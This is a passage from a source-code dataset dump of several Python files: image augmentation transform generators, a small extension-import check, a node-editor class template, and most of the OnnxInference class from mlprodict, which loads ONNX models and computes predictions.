crop_type in [\"relative_range\", \"relative\", \"absolute\"]\n self._init(locals())\n\n def get_transform(self, img):\n h, w = img.shape[:2]\n croph, cropw = self.get_crop_size((h, w))\n assert h >= croph and w >= cropw, \"Shape computation in {} has bugs.\".format(self)\n h0 = np.random.randint(h - croph + 1)\n w0 = np.random.randint(w - cropw + 1)\n return CropTransform(w0, h0, cropw, croph)\n\n def get_crop_size(self, image_size):\n \"\"\"\n Args:\n image_size (tuple): height, width\n\n Returns:\n crop_size (tuple): height, width in absolute pixels\n \"\"\"\n h, w = image_size\n if self.crop_type == \"relative\":\n ch, cw = self.crop_size\n return int(h * ch + 0.5), int(w * cw + 0.5)\n elif self.crop_type == \"relative_range\":\n crop_size = np.asarray(self.crop_size, dtype=np.float32)\n ch, cw = crop_size + np.random.rand(2) * (1 - crop_size)\n return int(h * ch + 0.5), int(w * cw + 0.5)\n elif self.crop_type == \"absolute\":\n return (min(self.crop_size[0], h), min(self.crop_size[1], w))\n else:\n 
NotImplementedError(\"Unknown crop type {}\".format(self.crop_type))\n\n\nclass RandomExtent(TransformGen):\n \"\"\"\n Outputs an image by cropping a random \"subrect\" of the source image.\n\n The subrect can be parameterized to include pixels outside the source image,\n in which case they will be set to zeros (i.e. black). The size of the output\n image will vary with the size of the random subrect.\n \"\"\"\n\n def __init__(self, scale_range, shift_range):\n \"\"\"\n Args:\n output_size (h, w): Dimensions of output image\n scale_range (l, h): Range of input-to-output size scaling factor\n shift_range (x, y): Range of shifts of the cropped subrect. The rect\n is shifted by [w / 2 * Uniform(-x, x), h / 2 * Uniform(-y, y)],\n where (w, h) is the (width, height) of the input image. Set each\n component to zero to crop at the image's center.\n \"\"\"\n super().__init__()\n self._init(locals())\n\n def get_transform(self, img):\n img_h, img_w = img.shape[:2]\n\n # Initialize src_rect to fit the input image.\n src_rect = np.array([-0.5 * img_w, -0.5 * img_h, 0.5 * img_w, 0.5 * img_h])\n\n # Apply a random scaling to the src_rect.\n src_rect *= np.random.uniform(self.scale_range[0], self.scale_range[1])\n\n # Apply a random shift to the coordinates origin.\n src_rect[0::2] += self.shift_range[0] * img_w * (np.random.rand() - 0.5)\n src_rect[1::2] += self.shift_range[1] * img_h * (np.random.rand() - 0.5)\n\n # Map src_rect coordinates into image coordinates (center at corner).\n src_rect[0::2] += 0.5 * img_w\n src_rect[1::2] += 0.5 * img_h\n\n return ExtentTransform(\n src_rect=(src_rect[0], src_rect[1], src_rect[2], src_rect[3]),\n output_size=(int(src_rect[3] - src_rect[1]), int(src_rect[2] - src_rect[0])),\n )\n\n\nclass RandomContrast(TransformGen):\n \"\"\"\n Randomly transforms image contrast.\n\n Contrast intensity is uniformly sampled in (intensity_min, intensity_max).\n - intensity < 1 will reduce contrast\n - intensity = 1 will preserve the input image\n - intensity > 1 will increase contrast\n\n See: https://pillow.readthedocs.io/en/3.0.x/reference/ImageEnhance.html\n \"\"\"\n\n def __init__(self, intensity_min, intensity_max):\n \"\"\"\n Args:\n intensity_min (float): Minimum augmentation\n intensity_max (float): Maximum augmentation\n \"\"\"\n super().__init__()\n self._init(locals())\n\n def get_transform(self, img):\n w = np.random.uniform(self.intensity_min, self.intensity_max)\n return BlendTransform(src_image=img.mean(), src_weight=1 - w, dst_weight=w)\n\n\nclass RandomBrightness(TransformGen):\n \"\"\"\n Randomly transforms image brightness.\n\n Brightness intensity is uniformly sampled in (intensity_min, intensity_max).\n - intensity < 1 will reduce brightness\n - intensity = 1 will preserve the input image\n - intensity > 1 will increase brightness\n\n See: https://pillow.readthedocs.io/en/3.0.x/reference/ImageEnhance.html\n \"\"\"\n\n def __init__(self, intensity_min, intensity_max):\n \"\"\"\n Args:\n intensity_min (float): Minimum augmentation\n intensity_max (float): Maximum augmentation\n \"\"\"\n super().__init__()\n self._init(locals())\n\n def get_transform(self, img):\n w = np.random.uniform(self.intensity_min, self.intensity_max)\n return BlendTransform(src_image=0, src_weight=1 - w, dst_weight=w)\n\n\nclass RandomSaturation(TransformGen):\n \"\"\"\n Randomly transforms image saturation.\n\n Saturation intensity is uniformly sampled in (intensity_min, intensity_max).\n - intensity < 1 will reduce saturation (make the image more grayscale)\n - intensity = 1 will 
preserve the input image\n - intensity > 1 will increase saturation\n\n See: https://pillow.readthedocs.io/en/3.0.x/reference/ImageEnhance.html\n \"\"\"\n\n def __init__(self, intensity_min, intensity_max):\n \"\"\"\n Args:\n intensity_min (float): Minimum augmentation (1 preserves input).\n intensity_max (float): Maximum augmentation (1 preserves input).\n \"\"\"\n super().__init__()\n self._init(locals())\n\n def get_transform(self, img):\n assert img.shape[-1] == 3, \"Saturation only works on RGB images\"\n w = np.random.uniform(self.intensity_min, self.intensity_max)\n grayscale = img.dot([0.299, 0.587, 0.114])[:, :, np.newaxis]\n return BlendTransform(src_image=grayscale, src_weight=1 - w, dst_weight=w)\n\n\nclass RandomLighting(TransformGen):\n \"\"\"\n Randomly transforms image color using fixed PCA over ImageNet.\n\n The degree of color jittering is randomly sampled via a normal distribution,\n with standard deviation given by the scale parameter.\n \"\"\"\n\n def __init__(self, scale):\n \"\"\"\n Args:\n scale (float): Standard deviation of principal component weighting.\n \"\"\"\n super().__init__()\n self._init(locals())\n self.eigen_vecs = np.array(\n [[-0.5675, 0.7192, 0.4009], [-0.5808, -0.0045, -0.8140], [-0.5836, -0.6948, 0.4203]]\n )\n self.eigen_vals = np.array([0.2175, 0.0188, 0.0045])\n\n def get_transform(self, img):\n assert img.shape[-1] == 3, \"Saturation only works on RGB images\"\n weights = np.random.normal(scale=self.scale, size=3)\n return BlendTransform(\n src_image=self.eigen_vecs.dot(weights * self.eigen_vals), src_weight=1.0, dst_weight=1.0\n )\n\n\ndef apply_transform_gens(transform_gens, img):\n \"\"\"\n Apply a list of :class:`TransformGen` on the input image, and\n returns the transformed image and a list of transforms.\n\n We cannot simply create and return all transforms without\n applying it to the image, because a subsequent transform may\n need the output of the previous one.\n\n Args:\n transform_gens (list): list of :class:`TransformGen` instance to\n be applied.\n img (ndarray): uint8 or floating point images with 1 or 3 channels.\n\n Returns:\n ndarray: the transformed image\n TransformList: contain the transforms that's used.\n \"\"\"\n for g in transform_gens:\n assert isinstance(g, TransformGen), g\n\n check_dtype(img)\n\n tfms = []\n for g in transform_gens:\n tfm = g.get_transform(img)\n assert isinstance(\n tfm, Transform\n ), \"TransformGen {} must return an instance of Transform! Got {} instead\".format(g, tfm)\n img = tfm.apply_image(img)\n tfms.append(tfm)\n return img, TransformList(tfms)\n"} {"ext": "py", "sha": "1a30f55afc55ffd9d76cc7cffb4a3b2c47ee0a06", "content": "def independence():\n # Simply check that extensions can be imported. 
This is run in a test\n # flagged as \"local\" since we want extensions to be possible to import in\n # standalone unit tests.\n #\n # Nothing in extensions can actually be used, of course, but that's not a\n # problem; the unit tests simply need to make sure not to depend on that.\n\n import extensions\n\n print \"independence: ok\"\n"} {"ext": "py", "sha": "1a30f7e940e9bfb29cf40041df665831c84cc02d", "content": "from custom_src.NodeInstance import NodeInstance\nfrom custom_src.Node import Node\n\n\n# USEFUL\n# self.input(index) <- access to input data\n# self.outputs[index].set_val(val) <- set output data port value\n# self.main_widget <- access to main widget\n# self.exec_output(index) <- executes an execution output\n# self.create_new_input(type_, label, append=True, widget_type='', widget_name='', widget_pos='under')\n# self.delete_input(input or index)\n# self.create_new_output(type_, label, append=True)\n# self.delete_output(output or index)\n# self.update_shape()\n\n\nclass %NODE_TITLE%_NodeInstance(NodeInstance):\n def __init__(self, parent_node: Node, flow, configuration=None):\n super(%NODE_TITLE%_NodeInstance, self).__init__(parent_node, flow, configuration)\n\n self.initialized()\n\n\n def update_event(self, input_called=-1):\n if input_called == 0:\n while(self.input(1)):\n self.exec_output(0)\n\n def get_data(self):\n data = {}\n # ...\n return data\n\n def set_data(self, data):\n pass\n # ...\n\n\n\n # optional - important for threading - stop everything here\n def removing(self):\n pass\n"} {"ext": "py", "sha": "1a30fa90bed29cfd4968dd1a9d15b59b9ffad0ab", "content": "# pylint: disable=C0302\n\"\"\"\n@file\n@brief Implements a class able to compute the predictions\nfrom on an :epkg:`ONNX` model.\n\"\"\"\nfrom collections import OrderedDict\nfrom io import BytesIO\nfrom time import perf_counter\nimport warnings\nimport textwrap\nimport pprint\nimport numpy\nfrom scipy.sparse import coo_matrix\nfrom onnx import load, load_model, checker, shape_inference\nfrom onnx import onnx_pb as onnx_proto\nfrom onnx.helper import make_model\nfrom ..tools.code_helper import make_callable, print_code\nfrom ..onnx_tools.onnx2py_helper import (\n _var_as_dict, numpy_min, numpy_max, guess_numpy_type_from_string)\nfrom ..onnx_tools.onnx_manipulations import (\n select_model_inputs_outputs, enumerate_model_node_outputs,\n overwrite_opset, insert_results_into_onnx)\nfrom ..onnx_tools.optim import onnx_remove_node_unused\nfrom .onnx_inference_node import OnnxInferenceNode\nfrom .onnx_inference_exports import OnnxInferenceExport\nfrom .shape_object import ShapeObject\nfrom .type_object import SequenceType\n\n\nclass OnnxInference:\n \"\"\"\n Loads an :epkg:`ONNX` file or object or stream.\n Computes the output of the :epkg:`ONNX` graph.\n Several runtimes are available.\n\n * ``'python'``: the runtime implements every onnx operator\n needed to run a :epkg:`scikit-learn` model by using :epkg:`numpy`\n or C++ code.\n * ``'python_compiled'``: it is the same runtime than the previous\n one except every operator is called from a compiled function\n (@see me _build_compile_run) instead for a method going through\n the list of operator\n * ``'onnxruntime1'``: uses :epkg:`onnxruntime`\n * ``'onnxruntime2'``: this mode is mostly used to debug as\n python handles calling every operator but :epkg:`onnxruntime`\n is called for every of them, this process may fail due to\n wrong inference type specially of the graph includes\n custom nodes, in that case, it is better to compute the output\n of intermediates 
nodes. It is much slower as fo every output, every\n node is computed but more robust.\n\n :param onnx_or_bytes_or_stream: :epkg:`onnx` object,\n bytes, or filename or stream\n :param runtime: runtime options\n :param skip_run: do not build the runtime\n :param inplace: use inplace computation as much as possible\n :param input_inplace: the computation is allowed\n to overwrite the input, see :meth:`_guess_inplace\n <mlprodict.onnxrt.onnx_inference.OnnxInference._guess_inplace>`\n :param ir_version: if not None, overwrite the default version\n :param target_opset: used to overwrite *target_opset*\n :param runtime_options: specific options for the runtime\n :param inside_loop: tells the runtime the graph is meant to\n be repeated multiple times (in that case, inputs and\n outputs may share the same name)\n :param static_inputs: Loop can use static variables,\n variables from the graph which runs the loop\n (enumerate of strings)\n :param new_outputs: if the loading fails, it might worth\n cutting the graph, if not None, the graph will\n be cut to have these new_outputs as the final outputs\n :param new_opset: overwrite the main opset and replaces\n by this new one\n :param device: device, a string `cpu`, `cuda`, `cuda:0`...,\n this option is only available with runtime *onnxruntime1*\n\n Among the possible runtime_options, there are:\n * *enable_profiling*: enables profiling for :epkg:`onnxruntime`\n * *session_options*: an instance of *SessionOptions* from\n :epkg:`onnxruntime`\n * *ir_version*: change ir_version\n\n .. versionchanged:: 0.7\n Parameters *new_outputs*, *new_opset* were added.\n\n .. versionchanged:: 0.8\n Parameters *static_inputs*, *device* were added.\n \"\"\"\n\n def __init__(self, onnx_or_bytes_or_stream, runtime=None,\n skip_run=False, inplace=True,\n input_inplace=False, ir_version=None,\n target_opset=None, runtime_options=None,\n session_options=None, inside_loop=False,\n static_inputs=None, new_outputs=None, new_opset=None,\n device=None):\n if isinstance(onnx_or_bytes_or_stream, bytes):\n self.obj = load_model(BytesIO(onnx_or_bytes_or_stream))\n elif isinstance(onnx_or_bytes_or_stream, BytesIO):\n self.obj = load_model(onnx_or_bytes_or_stream)\n elif isinstance(onnx_or_bytes_or_stream, str):\n self.obj = load(onnx_or_bytes_or_stream)\n elif hasattr(onnx_or_bytes_or_stream, 'graph'):\n self.obj = onnx_or_bytes_or_stream\n elif isinstance(onnx_or_bytes_or_stream, onnx_proto.GraphProto):\n self.obj = make_model(onnx_or_bytes_or_stream,\n producer_name='mlprodict')\n else:\n raise TypeError(\"Unable to handle type {}.\".format( # pragma: no cover\n type(onnx_or_bytes_or_stream)))\n if ir_version is not None:\n self.obj.ir_version = ir_version\n if new_outputs is not None:\n self.obj = select_model_inputs_outputs(\n self.obj, outputs=new_outputs, infer_shapes=True)\n if new_opset is not None:\n self.obj = overwrite_opset(self.obj, new_opset)\n if device is not None and runtime != 'onnxruntime1':\n raise ValueError(\n \"Incompatible values, device can be specified with \"\n \"runtime 'onnxruntime1', not %r.\" % runtime)\n\n self.runtime = runtime\n self.skip_run = skip_run\n self.input_inplace = input_inplace\n self.inplace = inplace\n self.force_target_opset = target_opset\n self.runtime_options = runtime_options\n self.inside_loop = inside_loop\n self.static_inputs = static_inputs\n self.device = device\n self._init()\n\n def __getstate__(self):\n \"\"\"\n To pickle the object.\n \"\"\"\n return {'onnx': self.obj.SerializeToString(),\n 'runtime': self.runtime,\n 
'runtime_options': self.runtime_options,\n 'skip_run': self.skip_run,\n 'input_inplace': self.input_inplace,\n 'inplace': self.inplace,\n 'force_target_opset': self.force_target_opset,\n 'static_inputs': self.static_inputs,\n 'inside_loop': self.inside_loop,\n 'device': self.device}\n\n def __setstate__(self, state):\n \"\"\"\n To unpickle the object.\n \"\"\"\n onx = state['onnx']\n self.obj = load_model(BytesIO(onx))\n self.runtime = state['runtime']\n self.runtime_options = state['runtime_options']\n self.skip_run = state['skip_run']\n self.input_inplace = state['input_inplace']\n self.inplace = state['inplace']\n self.force_target_opset = state['force_target_opset']\n self.static_inputs = state['static_inputs']\n self.inside_loop = state['inside_loop']\n self.device = state['device']\n self._init()\n\n def _init(self):\n \"\"\"\n Prepares the instance to deliver predictions.\n \"\"\"\n self.graph_ = self.to_sequence()\n if len(self.graph_['sequence']) == 0:\n raise RuntimeError( # pragma: no cover\n \"No runnable nodes was found in the ONNX graph.\")\n self.outputs_ = self.graph_['outputs']\n self.inputs_ = self.graph_['inputs']\n\n for ino in [self.obj.graph.input, self.obj.graph.output]:\n for xy in ino:\n shape = xy.type.tensor_type.shape\n for d in shape.dim:\n if d.dim_value == 0 and \"0\" in str(d) and 'dim_param' not in str(d):\n # d.dim_value returns 0 whether is is 0 or empty.\n # it may be a parameter as well\n raise RuntimeError( # pragma: no cover\n \"Wrong ONNX file, one input or output has an empty shape: \"\n \"{}.\".format(xy))\n\n self.target_opset_ = self.graph_['targets']\n if self.force_target_opset is not None:\n if isinstance(self.force_target_opset, dict):\n self.target_opset_ = self.force_target_opset # pragma: no cover\n else:\n self.target_opset_ = {'': self.force_target_opset}\n self.ir_version_ = self.graph_['ir_version']\n\n if not self.skip_run:\n if self.runtime == 'onnxruntime1':\n # Loads the onnx with onnxruntime as a single file.\n del self.graph_\n from .ops_whole.session import OnnxWholeSession\n self._whole = OnnxWholeSession(\n self.obj, self.runtime, self.runtime_options,\n self.device)\n self._run = self._run_whole_runtime\n else:\n self.sequence_ = self.graph_['sequence']\n self.inits_ = self.graph_['inits']\n self.statics_ = self.graph_['statics']\n dtype = self._guess_input_dtype()\n variables = self.inits_.copy()\n for node in self.sequence_:\n domain = node.onnx_node.domain\n target_opset = self.target_opset_.get(domain, None)\n if self.runtime in ('onnxruntime2', 'empty'):\n node.setup_runtime(self.runtime, variables, self.__class__,\n target_opset=target_opset, dtype=dtype,\n domain=domain, ir_version=self.ir_version_,\n runtime_options=self.runtime_options)\n else:\n node.setup_runtime(self.runtime, variables, self.__class__,\n target_opset=target_opset, domain=domain,\n ir_version=self.ir_version_,\n runtime_options=self.runtime_options)\n if hasattr(node, 'ops_') and hasattr(node.ops_, 'typed_outputs_'):\n for k, v in node.ops_.typed_outputs_:\n variables[k] = v\n self._run = self._run_sequence_runtime\n\n if not self.skip_run and self.runtime in ('python', None):\n self.shapes_ = self._set_shape_inference_runtime()\n if self.inplace:\n self.inplaces_ = self._guess_inplace(self.input_inplace)\n self.exporters_ = OnnxInferenceExport(self)\n self.to_json = self.exporters_.to_json\n self.to_dot = self.exporters_.to_dot\n self.to_python = self.exporters_.to_python\n self.to_text = self.exporters_.to_text\n self.to_onnx_code = 
self.exporters_.to_onnx_code\n\n if self.runtime in ('python_compiled', 'python_compiled_debug'):\n # switch the inference method to the compiled one\n _, fct, code = self._build_compile_run('debug' in self.runtime)\n setattr(self, '_run_compiled', fct)\n setattr(self, '_run_compiled_code', code)\n self._run = self._run_sequence_runtime_compiled\n\n def _run_sequence_runtime_compiled(\n self, inputs, clean_right_away=False, intermediate=False,\n verbose=0, node_time=False, yield_ops=None, fLOG=None):\n \"\"\"\n Executes a compiled version of @see me _run_sequence_runtime,\n compiled with method @see me _build_compile_run.\n Every parameter with a default value is ignored.\n Switch to ``runtime='python'`` to enable those.\n \"\"\"\n try:\n return self._run_compiled( # pylint: disable=E1101\n inputs, yield_ops=yield_ops)\n except NameError as e:\n raise RuntimeError( # pragma: no cover\n \"Unable to compute prediction due to %r. Code:\\n%s\"\n \"\" % (e, print_code(\n self._run_compiled_code))) from e # pylint: disable=E1101\n\n def _guess_input_dtype(self):\n for _, v in self.graph_['inputs'].items():\n if 'type' not in v:\n continue # pragma: no cover\n t = v['type']\n if 'elem' not in t:\n continue\n if t['elem'] == 'double':\n return numpy.float64\n return numpy.float32\n\n def __str__(self):\n \"\"\"\n usual\n \"\"\"\n rows = ['OnnxInference(...)']\n if hasattr(self, '_run_compiled_code'):\n rows.append(\n textwrap.indent(\n self._run_compiled_code, ' ')) # pylint: disable=E1101\n else:\n rows.append(textwrap.indent(str(self.obj), ' '))\n return \"\\n\".join(rows)\n\n def __repr__(self):\n \"\"\"\n usual\n \"\"\"\n return \"OnnxInference(...)\" # pragma: no cover\n\n def check_model(self):\n \"\"\"\n Checks the model follow :epkg:`ONNX` conventions.\n \"\"\"\n checker.check_model(self.obj)\n\n def shape_inference(self):\n \"\"\"\n Infers the shape of the outputs\n with :epkg:`onnx` package.\n\n @return A new :epkg:`ONNX` graph which defined outputs.\n \"\"\"\n return shape_inference.infer_shapes(self.obj)\n\n @property\n def input_names(self):\n \"\"\"\n Returns the names of all inputs.\n It does not include the optional inputs.\n\n .. versionchanged:: 0.6\n The list does not include optional inputs anymore.\n \"\"\"\n inits = set(_.name for _ in self.obj.graph.initializer)\n return [_.name for _ in self.obj.graph.input if _.name not in inits]\n\n @property\n def input_names_shapes(self):\n \"\"\"\n Returns the names and shapes of all inputs.\n This method assumes all inputs are tensors.\n It does not include the optional inputs.\n\n .. versionchanged:: 0.6\n The list does not include optional inputs anymore.\n \"\"\"\n names = set(self.input_names)\n return [(_.name, _var_as_dict(_)['type']['shape'])\n for _ in self.obj.graph.input if _.name in names]\n\n @staticmethod\n def _get_type_property(info, prop):\n if prop in info:\n return info[prop]\n if 'kind' in info and info['kind'] == 'sequence':\n if prop == 'shape':\n return ('?', )\n raise NotImplementedError(\n \"Unable to retrieve property %r from %r.\"\n \"\" % (prop, info))\n\n @property\n def input_names_shapes_types(self):\n \"\"\"\n Returns the names, shapes, types of all inputs.\n This method assumes all inputs are tensors.\n It does not include the optional inputs.\n\n .. 
versionchanged:: 0.6\n The list does not include optional inputs anymore.\n \"\"\"\n f = OnnxInference._get_type_property\n names = set(self.input_names)\n return [(_.name, f(_var_as_dict(_)['type'], 'shape'),\n 'tensor(%s)' % f(_var_as_dict(_)['type'], 'elem'))\n for _ in self.obj.graph.input if _.name in names]\n\n @property\n def output_names(self):\n \"\"\"\n Returns the names of all outputs.\n \"\"\"\n return [_.name for _ in self.obj.graph.output]\n\n @property\n def output_names_shapes(self):\n \"\"\"\n Returns the names and shapes of all outputs.\n This method assumes all inputs are tensors.\n \"\"\"\n f = OnnxInference._get_type_property\n return [(_.name, f(_var_as_dict(_)['type'], 'shape'))\n for _ in self.obj.graph.output]\n\n @property\n def output_names_shapes_types(self):\n \"\"\"\n Returns the names, shapes, types of all outputs.\n This method assumes all inputs are tensors.\n It does not include the optional outputs.\n\n .. versionadd:: 0.7\n \"\"\"\n names = set(self.output_names)\n f = OnnxInference._get_type_property\n return [(_.name, f(_var_as_dict(_)['type'], 'shape'),\n 'tensor(%s)' % f(_var_as_dict(_)['type'], 'elem'))\n for _ in self.obj.graph.output if _.name in names]\n\n def global_index(self, name):\n \"\"\"\n Maps every name to one integer to avoid using dictionaries\n when running the predictions.\n\n @param name outputs name\n @return integer\n \"\"\"\n if not hasattr(self, '_global_index'):\n self._global_index = {}\n if name in self._global_index:\n return self._global_index[name]\n self._global_index[name] = len(self._global_index)\n return self._global_index[name]\n\n def to_sequence(self):\n \"\"\"\n Produces a graph to facilitate the execution.\n\n One example:\n\n .. exref::\n :title: Convert ONNX into graph\n\n An example on how to convert an :epkg:`ONNX`\n graph into a graph.\n\n .. 
runpython::\n :showcode:\n :warningout: DeprecationWarning\n\n import pprint\n import numpy\n from skl2onnx.algebra.onnx_ops import OnnxLinearRegressor\n from skl2onnx.common.data_types import FloatTensorType\n from mlprodict.onnxrt import OnnxInference\n\n pars = dict(coefficients=numpy.array([1., 2.]),\n intercepts=numpy.array([1.]),\n post_transform='NONE')\n onx = OnnxLinearRegressor('X', output_names=['Y'], **pars)\n model_def = onx.to_onnx({'X': pars['coefficients'].astype(numpy.float32)},\n outputs=[('Y', FloatTensorType([1]))],\n target_opset=12)\n oinf = OnnxInference(model_def)\n pprint.pprint(oinf.to_sequence())\n\n See an example of representation in notebook\n :ref:`onnxvisualizationrst`.\n \"\"\"\n inits = {}\n variables = {}\n outputs = {}\n nodes = {}\n statics = {}\n targets = {}\n for o in self.obj.opset_import:\n targets[o.domain] = o.version\n\n # static variables\n if self.static_inputs is not None:\n for n in self.static_inputs:\n statics[n] = {'name': n}\n self.global_index(n)\n\n # inputs\n for obj in self.obj.graph.input:\n variables[obj.name] = _var_as_dict(obj)\n self.global_index(obj.name)\n\n # outputs\n for obj in self.obj.graph.output:\n if hasattr(obj, 'type') and str(obj.type) != '':\n outputs[obj.name] = _var_as_dict(obj)\n else:\n outputs[obj.name] = {'name': obj.name}\n self.global_index(obj.name)\n\n # initializer\n for obj in self.obj.graph.initializer:\n init_obj = _var_as_dict(obj)\n if init_obj is None:\n raise RuntimeError( # pragma: no cover\n \"Unable to convert an initializer\\n{}\".format(obj))\n inits[obj.name] = init_obj\n self.global_index(obj.name)\n if 'value' not in inits[obj.name]:\n raise RuntimeError( # pragma: no cover\n \"One initializer has no value: '{}'\\n{}\\n{}\".format(\n obj.name, inits[obj.name], obj))\n\n # nodes\n for node in self.obj.graph.node:\n dobj = _var_as_dict(node)\n if dobj is None:\n raise RuntimeError( # pragma: no cover\n \"Unable to convert a node\\n{}\".format(node))\n if 'atts' in dobj:\n atts = dobj['atts']\n for k, v in atts.items():\n if not isinstance(v, dict) or 'value' not in v:\n raise RuntimeError( # pragma: no cover\n \"A parameter has no (sparse) value '{}' \"\n \"for node '{}'\\nv={}\\ndobj=[{}]\".format(\n k, node.name, v, node))\n if node.name in nodes: # pragma: no cover\n i = 2\n while True:\n new_name = \"%s_n%i\" % (node.name, i)\n if new_name not in nodes:\n break\n i += 1\n else:\n new_name = node.name\n nodes[new_name] = OnnxInferenceNode(node, dobj, self.global_index)\n\n # names\n names = {}\n for k, v in statics.items():\n if (k, 0) in names:\n raise RuntimeError( # pragma: no cover\n \"Static variables '{}' already exists (tag='{}').\".format(\n k, names[k, 0][0]))\n names[k, 0] = ('S', v)\n for k, v in inits.items():\n if (k, 0) in names:\n raise RuntimeError( # pragma: no cover\n \"Initializer '{}' already exists (tag='{}').\".format(\n k, names[k, 0][0]))\n names[k, 0] = ('C', v)\n for k, v in variables.items():\n if (k, 0) in names:\n if k in inits:\n # Kind of default value for an input\n continue\n raise RuntimeError( # pragma: no cover\n \"Variable '{}' already exists (tag='{}').\".format(\n k, names[k, 0][0]))\n names[k, 0] = ('I', v)\n for k, v in outputs.items():\n if (k, 0) in names and self.runtime != 'empty':\n if not self.inside_loop or names[k, 0][0] != 'I':\n raise RuntimeError( # pragma: no cover\n \"Output '{}' already exists (tag='{}').\".format(\n k, names[k, 0][0]))\n else:\n # For input, output sharing the same name, we marked the name\n # as an input.\n 
continue\n names[k, 0] = ('O', v)\n for k, v in nodes.items():\n if (k, 1) in names:\n raise RuntimeError( # pragma: no cover\n \"Node '{}' already exists (tag='{}'). \"\n \"Use inside_loop=True to bypass this exception.\".format(\n k, names[k, 0][0]))\n names[k, 1] = ('N', v)\n\n # ordering\n order = {}\n modif = 1\n intermediate = {}\n while modif > 0:\n modif = 0\n for (k, _), v in names.items():\n if (k, 1) in order:\n # The operator node is already processed.\n continue\n if v[0] in {'I', 'C', 'S'}:\n if (k, 0) not in order:\n order[k, 0] = len(order) # A data node.\n modif += 1\n continue\n if v[0] == 'O':\n continue\n if all((inp, 0) in order for inp in v[1].inputs):\n # If all inputs are available,\n # We tell the operator node is processed.\n order[k, 1] = len(order)\n modif += 1\n for o in v[1].outputs:\n if (o, 0) in order:\n raise RuntimeError( # pragma: no cover\n \"Two nodes share the same output '{}' \"\n \"or an operator and an output \"\n \"share the same name. \"\n \"(node: {}).\".format(o, v[1]))\n # We add a data node.\n order[o, 0] = len(order)\n intermediate[o] = None\n modif += 1\n\n # compute\n rev = [(v, k[0], k[1]) for k, v in order.items()]\n rev.sort()\n sequence = []\n for _, name, node_kind in rev:\n if name not in nodes:\n continue\n if node_kind == 0:\n # It is an output which shares the same name\n # as a node.\n continue\n node = nodes[name]\n node.set_order(len(sequence))\n sequence.append(node)\n\n if len(sequence) == 0:\n raise RuntimeError( # pragma: no cover\n \"No runnable nodes was found in the ONNX graph\"\n \"\\n--rev--\\n{}\"\n \"\\n--order--\\n{}\"\n \"\\n--nodes--\\n{}\"\n \"\\n---\".format(\n \"\\n\".join([str(_) for _ in names.items()]),\n \"\\n\".join([str(_) for _ in order.items()]),\n \"\\n\".join([str(_) for _ in nodes.items()])))\n\n # defines where an intermediare output is not needed\n last_used = {}\n for node in sequence:\n for inp in node.inputs:\n last_used[inp] = node.order\n for k, ord in last_used.items():\n sequence[ord].add_variable_to_clean(k)\n\n results = dict(inits=inits, inputs=variables, outputs=outputs,\n nodes=nodes, sequence=sequence,\n intermediate=intermediate,\n targets=targets, ir_version=self.obj.ir_version,\n statics=statics)\n if len(sequence) < len(nodes):\n # Not all node will be executed.\n raise RuntimeError( # pragma: no cover\n \"Unable to run all nodes.\\n--Nodes--\\n%s\\n--Sequence--\\n%s\"\n \"\\n--Inputs--\\n%s\\n--Inits--\\n%s\\n--Statics\\n%s\"\n \"\" % (pprint.pformat(nodes), pprint.pformat(sequence),\n pprint.pformat(list(variables)),\n pprint.pformat(list(inits)),\n pprint.pformat(list(statics))))\n return results\n\n def run(self, inputs, clean_right_away=False,\n intermediate=False, verbose=0, node_time=False,\n overwrite_types=None, yield_ops=None, fLOG=None):\n \"\"\"\n Computes the predictions for this :epkg:`onnx` graph.\n\n :param inputs: inputs as dictionary or a dataframe\n :param clean_right_away: clean the intermediate outputs\n as soon as they are not needed\n :param intermediate: returns a dictionary of intermediate\n variables instead of the results only\n :param verbose: display information while predicting\n :param node_time: measure time of each node\n :param overwrite_types: shape inference does not work all the time,\n this allows to force types when building intermediate\n results, see @see fn select_model_inputs_outputs\n :param yield_ops: dictionary to overwrite the output of\n operator *YieldOp*\n :param fLOG: logging function if *verbose > 0*\n :return: outputs as 
dictionary\n and a second dictionary of the time spent\n in each node if *node_time* is True\n\n .. exref::\n :title: Computes predictions with any runtime\n\n The following example compares predictions\n between :epkg:`scikit-learn` and this runtime\n for the python runtime.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n\n import numpy\n from sklearn.linear_model import LinearRegression\n from sklearn.datasets import load_iris\n from sklearn.model_selection import train_test_split\n from mlprodict.onnxrt import OnnxInference\n from mlprodict.onnx_conv import to_onnx\n\n iris = load_iris()\n X, y = iris.data, iris.target\n X_train, X_test, y_train, _ = train_test_split(X, y)\n clr = LinearRegression()\n clr.fit(X_train, y_train)\n\n exp = clr.predict(X_test[:5])\n print(exp)\n\n model_def = to_onnx(clr, X_train.astype(numpy.float32),\n target_opset=12)\n oinf = OnnxInference(model_def)\n y = oinf.run({'X': X_test[:5]})\n print(y)\n\n The function returns all intermediate outputs\n if *intermediate* is True. In case of runtime\n *onnxruntime1*, if intermediate is True,\n the first class builds all :epkg:`ONNX` cut out\n to keep the one output and converted into\n *OnnxInference*.\n\n .. versionchanged:: 0.8\n Parameter *yield_ops* was added.\n \"\"\"\n def retype(col_array):\n if (hasattr(col_array, 'categories') and\n hasattr(col_array, 'from_codes')):\n # isinstance(col_array, pandas.Categorical):\n return col_array.astype(numpy.int64)\n return col_array\n\n if hasattr(inputs, 'columns') and hasattr(inputs, 'iloc'):\n # == isinstance(inputs, pandas.DataFrame)\n inputs = OrderedDict((\n name, retype(numpy.expand_dims(inputs[name].values, axis=1)))\n for name in inputs.columns)\n if intermediate:\n if self.inplace:\n raise RuntimeError( # pragma: no cover\n \"inplace must be False if intermediate is True, a container \"\n \"might be used by several nodes.\")\n return self._run(inputs, clean_right_away=False,\n intermediate=intermediate,\n verbose=verbose, node_time=node_time,\n overwrite_types=overwrite_types,\n yield_ops=yield_ops, fLOG=fLOG)\n if overwrite_types is not None:\n raise RuntimeError( # pragma: no cover\n \"overwrite_types is not used if intermediate is False.\")\n return self._run(inputs, clean_right_away=False,\n intermediate=intermediate,\n verbose=verbose, node_time=node_time,\n yield_ops=yield_ops, fLOG=fLOG)\n\n def run2onnx(self, inputs, verbose=0, fLOG=None,\n as_parameter=True, suffix='_DBG',\n param_name=None, node_type='DEBUG',\n domain='DEBUG', domain_opset=1):\n \"\"\"\n Executes the graphs with the given inputs, then adds the intermediate\n results into ONNX nodes in the original graph. Once saved, it can be\n looked with a tool such as :epkg:`netron`.\n\n :param inputs: inputs as dictionary or a dataframe\n :param verbose: display information while predicting\n :param fLOG: logging function if *verbose > 0*\n :param as_parameter: add new nodes with results as one parameter\n (True) or as initializer (False)\n :param suffix: 